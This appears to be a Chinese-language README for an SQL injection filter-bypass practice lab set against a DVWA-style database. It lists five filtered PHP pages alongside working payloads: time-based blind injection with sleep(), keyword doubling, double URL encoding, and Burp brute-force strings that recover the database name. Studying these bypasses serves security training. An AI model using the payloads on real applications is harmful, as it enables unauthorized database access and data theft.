sqli-bypass
提示说明:
————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————
index1.php 空格过滤
index2.php 关键字过滤 and /or 大小写
index3.php 双写关键字 || mysql 隐形转换 poc 1''a'=if(user()+like+'r%',sleep(2),1)--+ (sleep修改成exp也可)//适用于字符型
index4.php 双重url编码
index5.php 绕过正则匹配
poc1:1'|| mid(schema(),1,1) like'd
poc2:1'anandd+mid(ususerer(),1,1)like'r
——————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————
index1:
使用bp爆破出数据库长度,payload:'and/!length(schema())='1'/%23,爆破得出数据库长度为4。
使用bp爆破出数据库名称,payload:'and/!mid(schema(),1,1)='1'/%23,爆破得出数据库长度为dvwa。
index2:
使用bp爆破出数据库长度,payload:'%26%26length(database())='1'%23 ,爆破得出数据库长度为4。
使用bp爆破出数据库名称,payload:'%26%26mid(database(),1,1)='1'%23,爆破得出数据库长度为dvwa。
